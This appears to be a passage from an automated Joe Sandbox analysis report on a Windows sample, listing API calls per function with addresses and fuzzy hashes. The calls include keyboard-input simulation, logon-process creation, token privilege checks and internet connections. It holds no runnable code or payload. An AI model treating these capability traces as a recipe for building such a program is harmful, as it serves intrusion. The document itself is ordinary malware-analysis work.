                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CDBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 00CDBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CDBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CDBB80
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 5564a2b5af9ddfab557098e59acd82888bbf8bd70ba7c37ec821e54f5e74031d
                    • Instruction ID: 6c506f2195e8d8e18642c9133a2cb1b303e7ae1e1c83172fe1d120eed8029ce0
                    • Opcode Fuzzy Hash: 5564a2b5af9ddfab557098e59acd82888bbf8bd70ba7c37ec821e54f5e74031d
                    • Instruction Fuzzy Hash: 08410239200610DFCB11EF15C584A5DBBE1EF89320B09C499EA4E9B362CB34FD01EB92
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CF8B4D
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: fde7fbc23268ffe400ce06213adabd386f70631afd1c94f8f7b2e059538b16f9
                    • Instruction ID: 763071db20dfca404a032b3e93ba683d244e766f3d9e974ab0303d3a90bb6b9d
                    • Opcode Fuzzy Hash: fde7fbc23268ffe400ce06213adabd386f70631afd1c94f8f7b2e059538b16f9
                    • Instruction Fuzzy Hash: 163172B460420CBFEFA49B59CC89FB93765EB05310F648516FB61D62A1CE30AA489753
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00CFAE1A
                    • GetWindowRect.USER32(?,?), ref: 00CFAE90
                    • PtInRect.USER32(?,?,00CFC304), ref: 00CFAEA0
                    • MessageBeep.USER32(00000000), ref: 00CFAF11
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: e4724ce08922fdfcc8d3ab58c797f0f82982259f8b04e303848b770913f55a8a
                    • Instruction ID: e9543ce93944880f1918f46dad365b646641cdd29df0678ba265026d7fdd4926
                    • Opcode Fuzzy Hash: e4724ce08922fdfcc8d3ab58c797f0f82982259f8b04e303848b770913f55a8a
                    • Instruction Fuzzy Hash: 774169B4600219AFCB51CF59C884BA9BBF5FF48350F1481A9EA18CB351D730E952DBA3
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CD10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CD110B
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: f33c13fe2eb3fb0b72c82c54751ec7032c930ce0dfcb8f11ac5c2163986ab6e8
                    • Instruction ID: 9e3e10fdef0308524e8298bc8b6f03ff3870a7ca2657037f67a9df56b1c3b06f
                    • Opcode Fuzzy Hash: f33c13fe2eb3fb0b72c82c54751ec7032c930ce0dfcb8f11ac5c2163986ab6e8
                    • Instruction Fuzzy Hash: 63313D70E40648BEFB30AA658C057FEBBA5AF44310F1C421BEB60523D1C3749AC19751
                    APIs
                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00CD1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CD1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CD11F1
                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00CD1243
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 234b8d558de2adead96ca320c8f178d1ec8ee269fd810dc693394f7d3e272588
                    • Instruction ID: fa1c7037b0f52c682632efa6747ceeae71b8a70220f20bab3610142141cf3b07
                    • Opcode Fuzzy Hash: 234b8d558de2adead96ca320c8f178d1ec8ee269fd810dc693394f7d3e272588
                    • Instruction Fuzzy Hash: AE31E9309406187AFF208A6588057FEBBAAAB45310F1C435FEBA1923D1C3758A559751
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CA644B
                    • __isleadbyte_l.LIBCMT ref: 00CA6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CA64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CA64DD
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 05b8fd267ca4d0cdc09b7ea4c93e3f967c51cdbf8a90dd46f406f0bba42cb3b7
                    • Instruction ID: 63b7dc8da8bda7ffb4dde7571bd62aa0304517f0c8c81605249b55676c046a62
                    • Opcode Fuzzy Hash: 05b8fd267ca4d0cdc09b7ea4c93e3f967c51cdbf8a90dd46f406f0bba42cb3b7
                    • Instruction Fuzzy Hash: DE31CD31600247AFDB22CF75C844BAA7BA5FF4A318F194429F864871A0EB31DA51DB90
                    APIs
                    • GetForegroundWindow.USER32 ref: 00CF5189
                      • Part of subcall function 00CD387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CD3897
                      • Part of subcall function 00CD387D: GetCurrentThreadId.KERNEL32 ref: 00CD389E
                      • Part of subcall function 00CD387D: AttachThreadInput.USER32(00000000,?,00CD52A7), ref: 00CD38A5
                    • GetCaretPos.USER32(?), ref: 00CF519A
                    • ClientToScreen.USER32(00000000,?), ref: 00CF51D5
                    • GetForegroundWindow.USER32 ref: 00CF51DB
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 412faef2df4431a455aaf2a245416de72f321150cb2a68a896b5ddb3de0af537
                    • Instruction ID: c0d6f0ebfd597cb5639c583c2f23831db55cd58a3d53fcfa5cf22d3fca379861
                    • Opcode Fuzzy Hash: 412faef2df4431a455aaf2a245416de72f321150cb2a68a896b5ddb3de0af537
                    • Instruction Fuzzy Hash: A831FC71900108AFDB00EFA5CD85EEFB7F9EF98300F10806AE515E7251EA75AE45DBA1
                    APIs
                    • __setmode.LIBCMT ref: 00C90BF2
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CD7B20,?,?,00000000), ref: 00C75B8C
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CD7B20,?,?,00000000,?,?), ref: 00C75BB0
                    • _fprintf.LIBCMT ref: 00C90C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00CC6331
                      • Part of subcall function 00C94CDA: _flsall.LIBCMT ref: 00C94CF3
                    • __setmode.LIBCMT ref: 00C90C5E
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: e494cd35f01a3b187fae85ce2d95b720d466b1d2c6104e2cfe71abe2e9e92fcf
                    • Instruction ID: 80137198f96526924a61e30e7a3ea13c4c5d7bca02c5d1f43bd712b134874198
                    • Opcode Fuzzy Hash: e494cd35f01a3b187fae85ce2d95b720d466b1d2c6104e2cfe71abe2e9e92fcf
                    • Instruction Fuzzy Hash: BD112731904608BFDF0873B49C4AEBE7B6DDF45320F14411AF208572D2DF605D46A3A6
                    APIs
                      • Part of subcall function 00CC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CC8669
                      • Part of subcall function 00CC8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8673
                      • Part of subcall function 00CC8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8682
                      • Part of subcall function 00CC8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00CC8689
                      • Part of subcall function 00CC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00CC8BEB
                    • _memcmp.LIBCMT ref: 00CC8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CC8C44
                    • HeapFree.KERNEL32(00000000), ref: 00CC8C4B
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 2182266621-0
                    • Opcode ID: a870a1260e13af9ff7ce6f413bdeaa5de460e158c8117b05b59f3a963fc98682
                    • Instruction ID: fb2863b382bfb0b565318b904d2ae520c9b98091fd24aeb2f99c373637e7c626
                    • Opcode Fuzzy Hash: a870a1260e13af9ff7ce6f413bdeaa5de460e158c8117b05b59f3a963fc98682
                    • Instruction Fuzzy Hash: E2216B72E01209ABDB10DFA4C945FEEB7B8FF44355F15409DE564A7240DB31AA0ADB60
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE1A97
                      • Part of subcall function 00CE1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE1B40
                      • Part of subcall function 00CE1B21: InternetCloseHandle.WININET(00000000), ref: 00CE1BDD
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 3b0f4382181216402288a13cb45a4cc27f2dbdc67147d308acb4447a05200f57
                    • Instruction ID: baafd4c4d8e11ae7fb98db4ab09e721c9136f1e49d87842aae0c928a677e1424
                    • Opcode Fuzzy Hash: 3b0f4382181216402288a13cb45a4cc27f2dbdc67147d308acb4447a05200f57
                    • Instruction Fuzzy Hash: 2521D471200641BFDB119F62CC00FBAB7ADFF44711F14001AFE5196650E731E921E794
                    APIs
                      • Part of subcall function 00CCF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CCE1C4,?,?,?,00CCEFB7,00000000,000000EF,00000119,?,?), ref: 00CCF5BC
                      • Part of subcall function 00CCF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00CCF5E2
                      • Part of subcall function 00CCF5AD: lstrcmpiW.KERNEL32(00000000,?,00CCE1C4,?,?,?,00CCEFB7,00000000,000000EF,00000119,?,?), ref: 00CCF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CCEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CCE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00CCE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CCEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CCE237
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 28d21ce7a2f8f5822c10e3f90d688e0fe136e062d170971a81ab5808f970076c
                    • Instruction ID: 8e24ce9a2dc3ae864eebebc26851b34618cda585fc4a4bf56a025bec6c704e01
                    • Opcode Fuzzy Hash: 28d21ce7a2f8f5822c10e3f90d688e0fe136e062d170971a81ab5808f970076c
                    • Instruction Fuzzy Hash: 3111BE36200301EFCB25AF64D849F7A77A9FF85350B40802EE916CB260EB719951D7A1
                    APIs
                    • _free.LIBCMT ref: 00CA5351
                      • Part of subcall function 00C9594C: __FF_MSGBANNER.LIBCMT ref: 00C95963
                      • Part of subcall function 00C9594C: __NMSG_WRITE.LIBCMT ref: 00C9596A
                      • Part of subcall function 00C9594C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 00C9598F
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 70a5fb7184d61bc0899a11d1b733b7581cc8f2c943886d6cbd65bcd859b6c4b2
                    • Instruction ID: 94dd54ca34c00e20d956a4e248850f2f0fde1f7a75628b1b273838890acdbb21
                    • Opcode Fuzzy Hash: 70a5fb7184d61bc0899a11d1b733b7581cc8f2c943886d6cbd65bcd859b6c4b2
                    • Instruction Fuzzy Hash: 9811E333506A17AFCF312F70AC4876E37989F563A8B10842AF9559B1B0DFB58A41A790
                    APIs
                    • _memset.LIBCMT ref: 00C74560
                      • Part of subcall function 00C7410D: _memset.LIBCMT ref: 00C7418D
                      • Part of subcall function 00C7410D: _wcscpy.LIBCMT ref: 00C741E1
                      • Part of subcall function 00C7410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C741F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00C745B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C745C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CAD6CE
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: a8d6a79805dc11c6cc0c8935b06333930c397a2e5577264ac2c21df048a4a783
                    • Instruction ID: 193850778eb8b48f65fc856de1cde367b0bdc6f048383edae795b4c09a34eab3
                    • Opcode Fuzzy Hash: a8d6a79805dc11c6cc0c8935b06333930c397a2e5577264ac2c21df048a4a783
                    • Instruction Fuzzy Hash: 4521F970904784AFEB728B24DC49BEBBBEC9F02308F04449EE6AF56241C7745B85DB51
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CC8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00CC8B31
                    • CloseHandle.KERNEL32(00000004), ref: 00CC8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CC8B7A
                    Similarity
                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 2621361867-0
                    • Opcode ID: 94bcb39bf7b086e478fd5f3dd0787249de419be5f6ab33f819eb9ca2e35b6bdc
                    • Instruction ID: 6de5d05e75da99a64b0295d9ca1dc4b7556bcaf58eb30c274eef749ed1f95ee1
                    • Opcode Fuzzy Hash: 94bcb39bf7b086e478fd5f3dd0787249de419be5f6ab33f819eb9ca2e35b6bdc
                    • Instruction Fuzzy Hash: B0113DB250120DABDF018FA4DD49FEF7BA9EF08304F044069FE04A2160C7769E65DB61
                    APIs
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CD7B20,?,?,00000000), ref: 00C75B8C
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CD7B20,?,?,00000000,?,?), ref: 00C75BB0
                    • gethostbyname.WS2_32(?), ref: 00CE66AC
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE66B7
                    • _memmove.LIBCMT ref: 00CE66E4
                    • inet_ntoa.WS2_32(?), ref: 00CE66EF
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: baf53718df7ae97cbd70a442d8cc3a2c55891d473567a26a24000471e4999e5c
                    • Instruction ID: 6f80c4e87098f53075095c8e9a27cd36e7e6257e3e44a33ee94df3187a344bc4
                    • Opcode Fuzzy Hash: baf53718df7ae97cbd70a442d8cc3a2c55891d473567a26a24000471e4999e5c
                    • Instruction Fuzzy Hash: 3D116335500509AFCB04FBA5DD86EEE77B8EF14350B148069F50AA71A1DF709E04EB51
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CC9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CC9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CC906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CC9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 61b0f4b5a9a62d084da09361274c835320193cdb54550b2ae2bd89f8ae77a5be
                    • Instruction ID: 12054206a62a6f7c87225a22810d4eadd5b656ef5af98b0cb1815c8e0f60a60c
                    • Opcode Fuzzy Hash: 61b0f4b5a9a62d084da09361274c835320193cdb54550b2ae2bd89f8ae77a5be
                    • Instruction Fuzzy Hash: 39114C79900218FFDB10DFA5C884FADBB74FB48310F204095E904B7250DA716E50DB94
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 99c0b4497553835af85124c778acb543d63fa3173e52bb53255c6a9a385ba443
                    • Instruction ID: 50a4dc0262bed43a442591870631bcffbaa6f8e72dcc7c374d893a19f1df57ee
                    • Opcode Fuzzy Hash: 99c0b4497553835af85124c778acb543d63fa3173e52bb53255c6a9a385ba443
                    • Instruction Fuzzy Hash: 4F111C31C10519E7CF009FA5D949BFEBB78FF09751F09405AEE40B6240CB709562CB96
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 650b1b02ab57d4ba640193b8fe3d25bf4b4c710603b46194f3fa377503de04fe
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 2A014B3614814AFBCF125F94CC059EE3F66BF6A359F588715FA2858031D236CAB1AB81
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00CFB59E
                    • ScreenToClient.USER32(?,?), ref: 00CFB5B6
                    • ScreenToClient.USER32(?,?), ref: 00CFB5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CFB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 40e485cf831e6e6cb70e1ec940f82dc632f5ae4ee68b64913c460cff5efad34c
                    • Instruction ID: 4946acbe609c28785223499d97da60b333fcc92249a5061ed70ce4421413c739
                    • Opcode Fuzzy Hash: 40e485cf831e6e6cb70e1ec940f82dc632f5ae4ee68b64913c460cff5efad34c
                    • Instruction Fuzzy Hash: 511134B9D00209EFDB41CF99C484AEEBBB5FF08310F104166E914E2220D735AA55CF51
                    APIs
                    • _memset.LIBCMT ref: 00CFB8FE
                    • _memset.LIBCMT ref: 00CFB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D37F20,00D37F64), ref: 00CFB93C
                    • CloseHandle.KERNEL32 ref: 00CFB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 61b29bc9fac16cb1aea04ea1bfdba53fef4132b42a5c86e6ce23746137c0be1a
                    • Instruction ID: 71513155e1003680ec556b6640ea260453bba0ef5091b5ec8148b8703d422747
                    • Opcode Fuzzy Hash: 61b29bc9fac16cb1aea04ea1bfdba53fef4132b42a5c86e6ce23746137c0be1a
                    • Instruction Fuzzy Hash: 5EF03AF26447447BE6202761AC09FBB3B9CFF08394F000020BA08D52A2D7714910C7B9
                    APIs
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00CD6E88
                      • Part of subcall function 00CD794E: _memset.LIBCMT ref: 00CD7983
                    • _memmove.LIBCMT ref: 00CD6EAB
                    • _memset.LIBCMT ref: 00CD6EB8
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00CD6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: f4806f57d8a909b80df6e977ced0f17c4bd3a7e19fba69ec5263228599abfe0a
                    • Instruction ID: 0ff1149d8df4310ee8f196051b8cbcb683f36fbb80a765bbe3294dee7b9e8348
                    • Opcode Fuzzy Hash: f4806f57d8a909b80df6e977ced0f17c4bd3a7e19fba69ec5263228599abfe0a
                    • Instruction Fuzzy Hash: 3BF0F47A104214ABCF016F55DC85B59BB29EF45360B048065FE085E21BC731A961DBB5
                    APIs
                      • Part of subcall function 00C712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7134D
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7135C
                      • Part of subcall function 00C712F3: BeginPath.GDI32(?), ref: 00C71373
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFC030
                    • LineTo.GDI32(00000000,?,?), ref: 00CFC03D
                    • EndPath.GDI32(00000000), ref: 00CFC04D
                    • StrokePath.GDI32(00000000), ref: 00CFC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: a3bab9e2a475b6c39a25e5a5824da2af589cfda00cf8213392c4ffe7b6250175
                    • Instruction ID: 319b7b6511f82cffa4a08a8a07a8d950421c254160c586bbabbaf1fbed53f53a
                    • Opcode Fuzzy Hash: a3bab9e2a475b6c39a25e5a5824da2af589cfda00cf8213392c4ffe7b6250175
                    • Instruction Fuzzy Hash: F4F05E3110525DBBDB126F54AC09FEE3F59AF0A311F048014FB11611E28B755652DBAA
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 00CCA3B3
                    • AttachThreadInput.USER32(00000000), ref: 00CCA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: e42684dadb46155faa9f6b3e53598c74e2c230b86d8b03957d0c148a43bd4183
